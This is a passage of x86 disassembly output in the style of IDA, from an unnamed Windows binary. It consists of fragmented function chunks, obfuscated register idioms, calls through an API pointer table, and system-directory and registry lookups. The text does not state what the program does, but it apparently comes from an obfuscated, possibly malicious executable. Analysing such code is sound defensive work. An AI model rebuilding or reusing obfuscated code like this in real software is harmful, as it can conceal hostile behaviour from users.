sub eax, eax
loc_9AEAEE: ; CODE XREF: sub_9AEAAC-1031�j
mov [ebp+var_1C], eax
cmp eax, 20h
jge loc_9AE890
jmp loc_9ADA70
sub_9AEAAC endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9AEB00: ; CODE XREF: sub_9AFC28+11C5�j
push dword_9BCB74
pop edx
mov ecx, [edx]
push eax
call dword ptr [ecx+24h]
jmp loc_9ADF17
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
xor eax, eax
mov dword_9BEBF8, eax
mov dword_9BEBF4, eax
retn
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B5FC0
loc_9AEB27: ; CODE XREF: sub_9B5FC0+49�j
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
push [ebp+var_1C]
pop ecx
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B5FC0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADCEC
loc_9AEB4C: ; CODE XREF: sub_9ADCEC-27F8�j
; DATA XREF: .text:off_9B8A0E�o
or eax, 0FFFFFFFFh
jmp loc_9ACE37
; END OF FUNCTION CHUNK FOR sub_9ADCEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AEB54: ; CODE XREF: sub_9AB1A0+2FA8�j
; DATA XREF: .text:off_9BA410�o
push dword_9BEC20[esi]
pop eax
test eax, eax
jz loc_9ABD29
jmp off_9BA688
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF654
loc_9AEB6C: ; CODE XREF: sub_9AF654+301A�j
mov dword ptr [ebp-1Ch], 1
jmp loc_9B06EB
; END OF FUNCTION CHUNK FOR sub_9AF654
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9AEB78: ; CODE XREF: sub_9B3150-78FD�j
push dword ptr [ebx+48h]
pop edi
cmp edi, eax
jz loc_9AEFA3
jmp loc_9AC39C
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AEB8C: ; CODE XREF: sub_9B3864-7252�j
; sub_9B3864-559B�j ...
mov [ebp+var_2054], 0
loc_9AEB96: ; CODE XREF: sub_9B3864-40EC�j
push 0
mov edx, [ebp+var_205C]
push edx
push ecx
push eax
mov eax, [ebp+var_2058]
push eax
push ebx
mov ecx, [ebp+var_2054]
push ecx
jmp loc_9B3D79
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AEBB8 proc near ; CODE XREF: sub_9AD3EC+2F�p
; sub_9AEE40+8�p ...
; FUNCTION CHUNK AT 009ABDE3 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009B1D30 SIZE 0000000B BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAA20
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 11Ch
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
sub ebx, ebx
mov [ebp-4], ebx
push 104h ; uSize
lea eax, [ebp-120h]
push eax ; lpBuffer
call GetSystemDirectoryA
mov [ebp-11Dh], bl
cmp byte ptr [ebp-11Fh], 3Ah
jnz loc_9B1D30
jmp off_9B9052
sub_9AEBB8 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AEC20 proc near ; CODE XREF: sub_9B1584:loc_9AEE10�p
; FUNCTION CHUNK AT 009AB70C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009AC8A8 SIZE 00000042 BYTES
; FUNCTION CHUNK AT 009ACD44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009AE5B7 SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009AF4FC SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B2FEC SIZE 00000083 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B92F8
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 218h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BADC8
call dword ptr [ecx+18h]
sub edi, edi
mov [ebp-4], edi
lea edx, [ebp-120h]
push edx
push 3
call sub_9B6078
lea eax, [ebp-224h]
push eax
push 8
mov ecx, dword_9BBD28
push ecx
call sub_9AE860
add esp, 14h
push eax
lea edx, [ebp-120h]
push 80000001h
pop ecx
call sub_9B3408
mov esi, eax
xor edx, edx
mov [ebp-228h], esi
push dword_9BBE3C
pop ecx
call sub_9AEE5C
push eax
jmp off_9BAA9D
sub_9AEC20 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AECC4: ; CODE XREF: sub_9B4FD0-7CA0�j
; DATA XREF: .text:off_9B9970�o
lea edx, [eax+eax*2]
shl edx, 4
cmp dword_9BBF74[edx], esi
jnz loc_9B4D8C
jmp loc_9B5708
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9AECDF: ; CODE XREF: sub_9B562C-817B�j
; sub_9B562C-6E9F�j ...
mov [ebp+var_4], 0FFFFFFFFh
mov ax, word ptr [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AED08: ; CODE XREF: sub_9B63D8-A5C2�j
; sub_9B63D8-9E08�j ...
cmp ebx, 200000h
jle loc_9AF37F
jmp loc_9AB5D0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AED1C: ; CODE XREF: sub_9B63D8-7C12�j
mov ecx, [ebp-2144h]
mov dword ptr [ecx], 0
mov edx, [ebp-2140h]
mov dword ptr [edx], 0
jmp loc_9AF90B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AED3C: ; CODE XREF: sub_9ADDA4+5327�j
mov dword ptr [ebp-20h], 7
loc_9AED43: ; CODE XREF: sub_9ADDA4-13D6�j
; sub_9ADDA4+149A�j ...
sub esi, esi
mov eax, [ebp-20h]
cmp eax, edi
jge loc_9AE030
jmp loc_9B1390
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9AED58: ; CODE XREF: sub_9AEAAC-210�j
mov eax, [ebp+arg_4]
imul ecx, 4Ch
add eax, ecx
mov ecx, [eax]
mov [ebp+var_28], ecx
mov ebx, [eax+8]
test cl, 1
mov [ebp+var_2C], ebx
mov edi, [eax+38h]
mov [ebp+var_30], edi
jz loc_9B42FE
jmp off_9B8FE5
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
loc_9AED80: ; CODE XREF: .text:009AE323�j
pop esi
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AED84: ; CODE XREF: sub_9B4FD0-50E8�j
mov edx, [ebp+10h]
cmp dword_9BBF80[eax], edx
jnz loc_9AB8C4
jmp off_9BA10F
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9AED9C: ; CODE XREF: sub_9B3A74-8BBA�j
mov ecx, dword_9BCB74
mov edx, [ecx+0Ch]
mov eax, [esi]
push eax
mov ecx, [esi+44h]
push ecx
push 3
push 0
push dword ptr [ebp-12Ch]
pop eax
push eax
push dword ptr [ebp-124h]
pop ecx
push ecx
call dword ptr [edx+18h]
or eax, eax
jnz loc_9B624E
jmp loc_9B6244
; END OF FUNCTION CHUNK FOR sub_9B3A74
; =============== S U B R O U T I N E =======================================
sub_9AEDD0 proc near ; CODE XREF: sub_9B43F4+3D�p
; FUNCTION CHUNK AT 009AB9E8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AD3A8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B1F1C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009B2998 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B3228 SIZE 00000013 BYTES
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push esi
push off_9BAD92
xor esi, esi
call dword ptr [ecx+18h]
xor eax, eax
loc_9AEDE8: ; CODE XREF: sub_9AEDD0+4460�j
mov ecx, dword_9BEC1C[eax]
or ecx, ecx
jz loc_9B3228
jmp loc_9AB9E8
sub_9AEDD0 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9AEDFC: ; CODE XREF: sub_9ABA3C+4CA5�j
; DATA XREF: .text:off_9B93AF�o
push esi
pop eax
lea edx, [eax+1]
loc_9AEE01: ; CODE XREF: sub_9ABA3C+33CA�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_9AEE01
jmp off_9BABA8
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1584
loc_9AEE10: ; CODE XREF: sub_9B1584+8B�j
call sub_9AEC20
call sub_9B3B1C
call sub_9B03E8
push ebx
push ebx
push off_9B946E
call sub_9ABF08
mov dword_9BF11C, eax
cmp eax, ebx
jz loc_9AD087
jmp off_9B982B
; END OF FUNCTION CHUNK FOR sub_9B1584
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AEE40 proc near ; CODE XREF: sub_9A5033+85�p
arg_0 = dword ptr 4
push [esp+arg_0]
pop eax
push eax
push 2
call sub_9AEBB8
xor eax, 0AB5D76CDh
push eax
call sub_9AE860
add esp, 0Ch
retn
sub_9AEE40 endp
; =============== S U B R O U T I N E =======================================
sub_9AEE5C proc near ; CODE XREF: sub_9AF25C-368E�p
; sub_9AF25C-3681�p ...
; FUNCTION CHUNK AT 009ADFF4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B07B8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B5A6C SIZE 00000006 BYTES
xor eax, eax
and ecx, ecx
jz nullsub_7
jmp off_9B9579
sub_9AEE5C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AEE6C: ; CODE XREF: sub_9B0930-2399�j
; DATA XREF: .text:off_9BA8EF�o
push 9Ch
push 40h
call edi
mov ecx, dword_9BCB74
mov [ecx], eax
push 8
push 40h
call edi
push dword_9BCB74
pop edx
mov [edx+4], eax
push 0Ch
push 40h
call edi
push dword_9BCB74
pop ecx
mov [ecx+8], eax
push 28h
push 40h
call edi
mov edx, dword_9BCB74
mov [edx+0Ch], eax
push 64h
push 40h
call edi
push dword_9BCB74
pop ecx
mov [ecx+10h], eax
jmp loc_9B55F4
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B46CC
loc_9AEEC4: ; CODE XREF: sub_9B46CC+F�j
; DATA XREF: .text:off_9BA703�o
mov eax, dword_9BCB74
mov ecx, [eax]
call dword ptr [ecx+30h]
sub eax, dword_9BEC18
cmp eax, 0EA60h
jbe loc_9B2C2A
jmp off_9B8DBA
; END OF FUNCTION CHUNK FOR sub_9B46CC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AEEE8: ; CODE XREF: sub_9B1A08-415A�j
push [ebp+var_41F4]
pop edx
push edx
xor edx, edx
call sub_9B5CDC
test eax, eax
jz loc_9AE1D8
jmp off_9B87A4
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AEF08: ; CODE XREF: sub_9B4950-1EA5�j
; DATA XREF: .text:off_9B8F85�o
push off_9B9F6A
call sub_9ABF08
mov dword_9BEC3C[edi], eax
mov ecx, [ebp-40h]
push ecx
mov edx, dword_9BEC2C[edi]
push edx
push off_9BB054
call sub_9ABF08
xor ebx, ebx
mov dword_9BEC40[edi], eax
mov esi, [ebp-1Ch]
loc_9AEF3A: ; CODE XREF: sub_9B4950-3CE�j
cmp dword_9BEC24[edi], ebx
jz loc_9B5C2E
jmp off_9BA88D
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9AEF4C: ; CODE XREF: sub_9B1B20-5932�j
push dword_9BCB74
pop edx
mov eax, [edx+0Ch]
push edi
push esi
push 3
push 0
lea ecx, [ebp+var_120]
push ecx
mov edx, [ebp+var_32C]
push edx
call dword ptr [eax+18h]
and eax, eax
jnz loc_9B192A
jmp loc_9B1920
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9AEF7C: ; CODE XREF: sub_9ACF9C+3D�j
cmp esi, 2000h
ja loc_9ADA23
jmp loc_9B5C80
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AEF90: ; CODE XREF: sub_9AC32C+1B02�j
; DATA XREF: .text:off_9B9F0F�o
or edi, 14h
loc_9AEF93: ; CODE XREF: sub_9AC32C+1AFC�j
; sub_9AC32C+7DFD�j
and ebx, ebx
jz loc_9AD0FB
jmp loc_9AC35C
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9AEFA3: ; CODE XREF: sub_9B3150-8342�j
; sub_9B3150-7903�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-1Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AEFC0: ; CODE XREF: sub_9B0930-56D2�j
push off_9BA107
mov edx, [eax+10h]
push dword ptr [edx]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
push dword ptr [ecx+10h]
pop edx
mov [edx+4], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+4]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9B9A0C
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9AF003: ; CODE XREF: sub_9AC6DC+5A4�j
; sub_9AC6DC+89BE�j
mov [ebp+var_4], 0FFFFFFFFh
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push off_9BAA6D
call dword ptr [edx+1Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AF030 proc near ; CODE XREF: sub_9B1D80-406�p
; sub_9B3864-4CB�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
; FUNCTION CHUNK AT 009AC620 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009AE8BD SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B0BE8 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 009B136C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B1518 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B19C4 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B281C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3600 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B37E8 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009B3F78 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009B4160 SIZE 00000043 BYTES
; FUNCTION CHUNK AT 009B4AE4 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B5140 SIZE 00000046 BYTES
; FUNCTION CHUNK AT 009B5738 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BA113
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
sub edi, edi
mov ebx, ecx
mov [ebp+var_18], esp
mov [ebp+var_20], edi
mov [ebp+var_1C], edi
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push off_9BA623
call dword ptr [ecx+18h]
mov [ebp+var_4], edi
mov esi, [ebp+arg_0]
lea esi, [esi+esi*2]
shl esi, 4
push dword_9BBF74[esi]
pop eax
test eax, eax
jz loc_9AC634
jmp off_9B91B2
sub_9AF030 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9AF098: ; CODE XREF: sub_9B2E04+337E�j
; DATA XREF: .text:off_9B99F6�o
cmp edi, 0FFFFFFFFh
jz loc_9B572A
jmp sub_9B037C
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF0A8: ; CODE XREF: sub_9B1A08+1262�j
cmp eax, 0FFFFFFFFh
jz loc_9B17C7
jmp loc_9B17B0
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3408
loc_9AF0B8: ; CODE XREF: sub_9B3408-65E4�j
; DATA XREF: .text:off_9B94F0�o
call sub_9B2160
mov esi, eax
mov [ebp-12Ch], esi
cmp esi, ebx
jz loc_9AB749
jmp off_9BAFE3
; END OF FUNCTION CHUNK FOR sub_9B3408
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AF0D4: ; CODE XREF: sub_9B03E8-3FA7�j
call sub_9B45AC
mov dword_9BF388+2, eax
push 9
push 9BF38Ah
pop edx
mov ecx, 4
call sub_9B1B20
loc_9AF0F0: ; CODE XREF: sub_9B03E8-3FAD�j
mov [ebp-4], esi
jmp loc_9AE4CE
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AF0F8: ; CODE XREF: sub_9B3864+1A4D�j
mov ecx, [ebp+var_204C]
test byte ptr [ecx+8], 8
jz loc_9AFC90
jmp off_9B9568
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AF110: ; CODE XREF: sub_9B1A08-22B�j
; DATA XREF: .text:off_9B93A7�o
lea esi, [edi+edi*4]
lea esi, [ebp+esi*8+var_41BC]
push dword ptr [esi]
pop eax
and eax, eax
jz loc_9AF99B
jmp off_9B9300
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9AF134: ; CODE XREF: sub_9ACF9C+2D40�j
; sub_9ACF9C+5DD0�j
lea ecx, [ebp-1Ch]
call sub_9B5480
jmp loc_9ADA23
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B562C
loc_9AF144: ; CODE XREF: sub_9B562C-5B29�j
push dword_9BCB74
pop edx
mov eax, [edx+18h]
lea ecx, [ebp+var_12C]
push ecx
lea edx, [ebp+var_130]
push edx
push off_9B8E55
push esi
call dword ptr [eax+0Ch]
test eax, eax
jz loc_9AE77C
jmp off_9B9EB0
; END OF FUNCTION CHUNK FOR sub_9B562C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9AF174: ; CODE XREF: sub_9AC250+1530�j
cmp edx, ebx
jz loc_9B536C
jmp loc_9B5528
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AF184: ; CODE XREF: sub_9B4FD0+5D�j
sub ecx, ecx
loc_9AF186: ; CODE XREF: sub_9B4FD0-970B�j
mov [ebp-22Ch], ecx
cmp ecx, 40h
jnb loc_9ABB60
jmp off_9BA40C
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFC28
loc_9AF19C: ; CODE XREF: sub_9AFC28+CCE�j
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
lea ecx, [ebp+var_20]
push ecx
push 0
push ebx
push off_9B9F9D
push 0
push 0
call dword ptr [eax+14h]
mov [ebp+var_24], eax
and eax, eax
jz loc_9ADF17
jmp loc_9B0DE4
; END OF FUNCTION CHUNK FOR sub_9AFC28
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AF1CC: ; CODE XREF: sub_9B1D80+BE�j
; DATA XREF: .text:off_9BA940�o
mov edx, [ebp-202Ch]
test edx, edx
js loc_9B3ECB
jmp off_9B90D5
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AF1E0: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B1C�o
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-27Ch]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ABF08
loc_9AF200: ; CODE XREF: sub_9ABF08+DC9�j
; sub_9ABF08+4CAA�j
; DATA XREF: ...
mov eax, dword_9BCB74
mov ecx, [eax]
push dword ptr [esi+8]
pop edx
push edx
call dword ptr [ecx+24h]
loc_9AF20F: ; CODE XREF: sub_9ABF08+6CEB�j
; sub_9ABF08+7689�j
mov eax, esi
call sub_9AC448
xor esi, esi
mov [ebp-1Ch], esi
loc_9AF21B: ; CODE XREF: sub_9ABF08+41�j
; sub_9ABF08+DC3�j
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9B131E
; END OF FUNCTION CHUNK FOR sub_9ABF08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4610
loc_9AF228: ; CODE XREF: sub_9B4610-6114�j
; sub_9B4610-1030�j ...
push edi
pop ecx
call sub_9B35A0
loc_9AF22F: ; CODE XREF: sub_9B4610-3B42�j
; sub_9B4610-1036�j
inc edi
jmp loc_9B4654
; END OF FUNCTION CHUNK FOR sub_9B4610
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AF238: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B2C�o ...
lea ecx, [edi-2]
mov [ebp-20h], ecx
jmp loc_9AED43
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF248: ; CODE XREF: sub_9B63D8-1B6B�j
cmp dword ptr [ebp-2130h], 0FFFFFFFFh
jnz loc_9AF94B
jmp loc_9AB6FC
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9AF25C proc near ; CODE XREF: sub_9AF030+4F4B�p
; FUNCTION CHUNK AT 009AB474 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009AB8CC SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AB9C8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009ABBC0 SIZE 0000005D BYTES
; FUNCTION CHUNK AT 009ABE44 SIZE 0000003E BYTES
; FUNCTION CHUNK AT 009AC4E8 SIZE 0000003C BYTES
; FUNCTION CHUNK AT 009ADBC4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B0B54 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B2618 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B33DB SIZE 0000002C BYTES
; FUNCTION CHUNK AT 009B3B78 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3F50 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009B4134 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B46B4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5344 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B6018 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B603C SIZE 0000002E BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA992
push offset unknown_libname_1 ; Microsoft VisualC 2-8/net runtime
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 24h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov esi, [ebp+8]
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BADC8
call dword ptr [ecx+18h]
mov dword ptr [ebp-4], 0
mov ecx, esi
call sub_9B3150
or eax, eax
jz loc_9AB8D1
jmp loc_9ABBC0
sub_9AF25C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9AF2B4: ; CODE XREF: sub_9ABD30+42CF�j
push [esp+0Ch+arg_8]
pop edx
pop edi
mov ecx, 1
pop esi
mov dword ptr [edx], 0
push ecx
pop eax
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AF2CC: ; CODE XREF: sub_9B0930+1767�j
; DATA XREF: .text:off_9B8904�o
push off_9BADC4
push dword ptr [eax]
pop eax
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
mov [edx+24h], eax
mov eax, dword_9BCB74
push dword ptr [eax+10h]
pop eax
push dword ptr [eax+24h]
pop ecx
or ecx, ecx
jz loc_9B23EF
jmp off_9B9707
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF300: ; CODE XREF: sub_9B63D8-873E�j
; DATA XREF: .text:off_9BAED1�o
mov dword ptr [ecx], 1
loc_9AF306: ; CODE XREF: sub_9B63D8-8744�j
push dword ptr [ebp-2150h]
pop edx
push dword ptr [ebp-2144h]
pop eax
add ebx, edx
mov [eax], ebx
jmp loc_9AF90B
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2160
loc_9AF328: ; CODE XREF: sub_9B2160+49�j
xor eax, eax
push 13h
pop ecx
mov edi, esi
rep stosd
mov [esi], ebx
inc ebx
push ebx
pop eax
call sub_9AF3E8
mov [esi+44h], eax
push ebx
pop eax
call sub_9AF3E8
mov [esi+48h], eax
mov edi, [esi+44h]
and edi, edi
jz loc_9B59DE
jmp loc_9B59CC
; END OF FUNCTION CHUNK FOR sub_9B2160
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AF35C: ; CODE XREF: sub_9ADAC4+BF9�j
push dword ptr [ebp-54h]
pop edi
jmp loc_9B5E5C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AF368: ; CODE XREF: sub_9B63D8-2C2B�j
sub ebx, ebx
mov [ebp-2128h], ebx
or eax, 0FFFFFFFFh
mov [ebp-2124h], eax
mov [ebp-2130h], eax
loc_9AF37F: ; CODE XREF: sub_9B63D8-76CA�j
push 2000h
